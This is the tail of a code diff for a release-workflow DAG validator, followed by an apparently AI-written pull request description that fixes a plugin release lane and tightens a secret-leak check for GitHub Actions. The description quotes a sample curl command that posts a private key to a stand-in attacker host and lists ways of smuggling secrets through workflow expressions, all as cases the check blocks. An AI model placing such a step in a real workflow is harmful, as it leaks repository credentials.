+    ["catalog publication races the release it advertises", (mutated) => {
+      chain(mutated)["marketplace-publish"] = ["preflight"];
+    }, /plugin_chain\.dependencies\.marketplace-publish must run behind publish/u],
+    ["the install proof stops waiting on catalog publication", (mutated) => {
+      chain(mutated)["post-publish-smoke"] = ["preflight", "publish"];
+    }, /plugin_chain\.dependencies\.post-publish-smoke must run behind marketplace-publish/u],
+    ["a dependency names a job the lane never declares", (mutated) => {
+      chain(mutated).publish = ["preflight", "plugin-proof", "imaginary-gate"];
+    }, /plugin_chain\.dependencies\.publish names undeclared job imaginary-gate/u],
+    ["the lane closes into a cycle no job can enter", (mutated) => {
+      chain(mutated).preflight = ["plugin-proof"];
+    }, /plugin_chain\.dependencies\.(?:preflight|plugin-proof) cannot depend on itself/u],
+  ];
+  for (const [name, mutate, expected] of mutations) {
+    await t.test(name, () => {
+      const mutated = structuredClone(graph);
+      mutate(mutated);
+      assert.throws(() => validateReleaseClaimGraph(mutated), expected);
+    });
+  }
+});
+
 test("evaluation requires exact repository and source-tree identity", () => {
   const fixture = positiveFixture();
   delete fixture.expected_identity.source_tree;

--- a/scripts/tests/fixtures/release-claims/positive.json
+++ b/scripts/tests/fixtures/release-claims/positive.json
@@ -17,7 +17,7 @@
       "type": "source_behavior",
       "tier": "source",
       "status": "pass",
-      "graph_sha256": "5a89e6d4445cb76117cf98d09c2cdd09184abeb7488d58009d5c90d84f401d3d",
+      "graph_sha256": "5e61e808ffb6edad30699c701b3f8c4182ddfeb3f7d83ba49bb41b1ce948aacb",
       "observed_at": "2026-07-16T11:00:00.000Z",
       "expires_at": "2026-07-17T11:00:00.000Z",
       "identity": {


### PR DESCRIPTION
The plugin fast lane never updated the public marketplace catalog.

`preflight` captured the live marketplace revision with `git ls-remote` and handed it to
`post-publish-smoke`. Preflight runs before the release exists, so that revision names the
**previous** release. Smoke then installed the previous plugin, compared it against
`inputs.version`, and failed — *after* `gh release create` had already made the tag and release
irreversible. Every plugin-lane release was arranged to end red, with a published tag and a
catalog that never learned about it.

## Deployment precondition — read before merging

**This PR cannot deliver a working plugin release on its own.** The `marketplace-publish`
environment and the two secrets it reads do not exist in this repository:

- `gh api repos/TheGreenCedar/CodeStory/actions/secrets` → `{"total_count":0,"secrets":[]}`
- `gh api repos/TheGreenCedar/CodeStory/environments` → `linux-vulkan-proof`,
  `macos-metal-release`, `macos-release-signing`, `release-evidence`, `vector-backend-decision`,
  `windows-vulkan-proof`. `marketplace-publish` is **not** among them.
- `gh api users/TheGreenCedar --jq .type` → `User`, so there are no organization secrets either.

`secrets.MARKETPLACE_APP_ID` / `MARKETPLACE_APP_PRIVATE_KEY` therefore resolve empty in every
context today, and `actions/create-github-app-token` fails on an empty `app-id`. That failure lands
in `marketplace-publish`, which `needs: publish` — i.e. still *after* the tag is irreversible, with
`post-publish-smoke` skipped rather than failing.

The gap is pre-existing (`release.yml:534` and `marketplace-sync.yml:33` reference the same
environment and secrets, and `release.yml`'s `marketplace-publish` has never executed), and
provisioning it is a repository setting outside this PR's authority. **Until the owner creates the
`marketplace-publish` environment and both secrets, #1553's symptom is relocated, not closed.**
This PR supplies the workflow and the policy that the credential plugs into.

## What changed

- `plugin-release.yml` gains a `marketplace-publish` job between `publish` and
  `post-publish-smoke`, mirroring `release.yml`: `environment: marketplace-publish`, a scoped
  GitHub App token minted per run, no repository write permission, and
  `publish-marketplace-catalog.mjs` pointing the catalog at the published commit.
- `post-publish-smoke` consumes `needs.marketplace-publish.outputs.marketplace_revision`.
- `preflight` no longer captures a marketplace revision at all, so there is no pre-publication
  revision left to reconnect by accident.

Catalog publication stays benign on failure: it runs after the release exists, so a failed push
leaves the catalog serving the previous release rather than one that does not exist, and
`marketplace-sync.yml` remains the recovery path.

## Secret containment

The lane still receives and forwards no secrets. It declares no callable secret surface,
`auto-release.yml` still passes none, and the one credential it may read is the marketplace app
identity, only in the step that mints the token.

The first version of that rule was fail-open. It tripped on a `secrets` key or a value containing
`"secrets."`, but `secrets.NAME` is only one of the ways an expression reaches the context:
`${{ toJSON(secrets) }}` dumps it whole, `${{ secrets['NAME'] }}` indexes it, contexts are
case-insensitive so `SECRETS.NAME` resolves too, and a walk over object entries never visits a
string sitting in a bare list. Four smuggling shapes the blanket ban had caught were policy-clean,
including `curl -d "${{ secrets['MARKETPLACE_APP_PRIVATE_KEY'] }}" https://evil.example` appended
to the job that tags the release.

The rule now redacts the two permitted identity reads at their exact position — the token step's
`app-id` and `private-key`, each matched against its exact expression — and requires the serialized
remainder to name secrets nowhere at all. Same whole-workflow scan as the ban it replaces, with one
hole cut in a known place, so it is no weaker than what it replaced. A token step minting from a
different credential, or a second step borrowing its name, keeps its mention and is refused.

## DAG and claim graph

The plugin lane's job DAG moves out of a hardcoded five-job list in the checker and into
`release-claims.json` as `workflow_policy.plugin_chain`. That moves the claim graph digest, which
is re-pinned in the evidence fixtures that attest it — including `report.json`'s
`candidate_sha256`, which pins `candidate.json`'s own bytes.

For the record: the checker rule this replaced was vacuous. `sameStrings(nonCommentLines(… ? "" :
""), []) || …` evaluates `nonCommentLines("")` → `[]`, so the left operand was unconditionally
true and `publish must wait on preflight and plugin proof` never fired. This PR turns dead code
into a live check.

Because the checker only asserts that `needs:` match whatever the data says, the data now carries a
schema. `workflow_policy.plugin_chain` is validated in the claim graph validator — which
`loadReleaseClaimGraph` runs for the checker too — for non-empty dependency lists, no dependency on
an undeclared job, no cycle, every job behind the `workflow-policy` gate, and the ordering the lane
exists to enforce: tagging behind preflight and the plugin proof, catalog publication behind the
release it advertises, install proof behind both. Without it, blanking `publish` and
`post-publish-smoke` to `[]` and deleting the matching `needs:` lines left both gates green with
`gh release create` detached from the release-authority checks and the whole plugin-proof matrix.

## Tests

`.github/scripts/check-workflow-policy.test.mjs` covers the defect and its neighbours: smoke
installing preflight's pre-publication revision, preflight resurrecting one, catalog publication
dropped from the lane or racing the release, a lost credential environment, an unpinned or
over-scoped token, an unbound `--version`, and a hidden revision output.

A dedicated block asserts the secret rule fails **closed** for every way of naming the context —
dot form, callable `secrets:` surface, `toJSON(secrets)`, bracket indexing, an exfiltrating `curl`
in the publish job, the alternate case, a bare list element, a token step minting from an unscoped
credential, and a second step borrowing the token step's name. Six of those nine fail without the
rule's repair.

`scripts/tests/codestory-release-claims.test.mjs` gains eleven subtests for `plugin_chain`, each
leaving the workflow and the graph agreeing with each other so only the schema can refuse them:
dropped contract, non-mapping dependencies, no jobs, `publish` and `post-publish-smoke` zeroed,
tagging no longer behind the plugin proof, the plugin proof deleted, catalog publication racing the
release, smoke no longer behind catalog publication, an undeclared dependency, and a cycle. All
eleven fail without the schema.

Proved both directions: with the `plugin-release.yml` fix reverted, `check-workflow-policy.mjs`
reports the same 11 violations; restored, everything is green.

Commands run:

- `node .github/scripts/check-workflow-policy.mjs` — pass
- `node --test .github/scripts/check-workflow-policy.test.mjs` — 392 pass, 0 fail
- `node --test scripts/tests/codestory-release-claims.test.mjs` — 31 pass, 0 fail
- `node --test` over the claim, closeout, evidence-gate and runner-contract suites — 69 pass, 0 fail
- `node --test .github/scripts/cargo-cache-contract.test.mjs` — 17 pass, 0 fail
- `node scripts/codestory-release-claims.mjs validate` — pass, digest `5e61e808ffb6…` unchanged
- `node .github/scripts/run-actionlint.mjs` — pass
- `node .github/scripts/check-doc-links.mjs` — pass

No Rust or Python sources changed, so `cargo test -p codestory-cli --test architecture_contracts`
does not apply.

Closes #1553 — kept as a closing keyword because `saga-issue-link-guard.yml` requires one on
`codex/` branches for project-board linkage. Read it together with the deployment precondition
above: the lane is correct once the `marketplace-publish` environment and its two secrets exist,
and not before. Reopen #1553 if it is merged without them.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
